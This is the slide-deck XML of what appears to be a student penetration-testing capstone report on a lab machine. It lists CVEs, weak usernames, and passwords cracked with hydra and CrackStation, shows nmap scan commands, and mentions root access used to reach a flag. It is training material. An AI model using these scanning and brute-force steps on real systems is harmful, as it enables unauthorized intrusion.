              </a:tblGrid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CVE-2019-6579 web server on port 80 open not secure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An attacker with access to the web server at port 80 can perform commands and modification with the authentication of an administrator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with the IP address, kali machine was able to access from a browser the capstone machine and navigate.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CVE-2007-0450 directory traversal in Apache HTTP server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Through this vulnerability the attacker can remotely read certain confidential file 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the fact that the secret folder was exposed, this allowed the attacker to have access to the usernames and to know how to get sensitive information.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simple and weak usernames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Ashton, Hannah, and Ryan are the first names of the employees, and at the same time, their usernames.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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>it was easier for the attacker to start cracking the passwords directly, than to search for the usernames that were already available</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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1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p61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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457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Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p61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092" name="Google Shape;1092;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="477925" y="1183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{2755310F-95EA-4E01-95FB-42BB52A92B5E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2696375"/>
                <a:gridCol w="2696375"/>
                <a:gridCol w="2696375"/>
              </a:tblGrid>
              <a:tr h="355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Vulnerability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Description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FFFF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Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF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182875" marL="182875" anchor="ctr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90000"/>
                    </a:solidFill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Weak passwords (brute-force Attack)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simple passwords are listed in wordlist as Rockyou and are easy to crack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Using hydra, the attacker was easily able to get Leopoldo (Ashton's password) to the secret folder, and from crackstation, he easily found Ryan's password, which linux4u to access webdav server.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86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Root privilege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Root</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200"/>
                        <a:t> is the system administrator account. The root user has the privilege to do everything a normal user couldn't.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BD9E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 sz="1200"/>
                        <a:t>root access allowed the attacker to list the folder that contained the flag txt</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="182875" marL="182875">
                    <a:lnL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A9B7C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6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7" name="Google Shape;1097;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="457200" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="1828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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerability of insecure open port 80</a:t>
            </a:r>
            <a:r>
              <a:rPr i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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0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9" name="Google Shape;1099;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275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0" name="Google Shape;1100;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="23715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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t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I scanned capstone machine ports using nmap command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Nmap 192.168.1.105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Nmap -sV 192.168.1.105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Achievements</a:t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1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>One host up two ports were open 22 for ssh and 80 apache HTTP</a:t>
            </a:r>
            <a:endParaRPr i="1"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1" name="Google Shape;1101;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813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01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3" name="Google Shape;1103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4" name="Google Shape;1104;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="314306" y="1276688"/>
            <a:ext cx="3311842" cy="2266614"/>
            <a:chOff x="-3342866" y="1885638"/>
            <a:chExt cx="4317917" cy="2954783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="Google Shape;1105;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3342866" y="4219120"/>
              <a:ext cx="6954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02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06" name="Google Shape;1106;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638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7" name="Google Shape;1107;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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8" name="Google Shape;1108;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="5258700" cy="3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182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="1828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109" name="Google Shape;1109;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3331585" y="887900"/>
            <a:ext cx="579616" cy="533489"/>
            <a:chOff x="-3195990" y="1377823"/>
            <a:chExt cx="4441500" cy="695462"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1110" name="Google Shape;1110;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3195990" y="1377823"/>
              <a:ext cx="4441500" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst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100">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="21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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="550893" y="1884660"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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2" name="Google Shape;1112;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst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13" name="Google Shape;111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6050" y="1480575"/>
            <a:ext cx="5333624" cy="3070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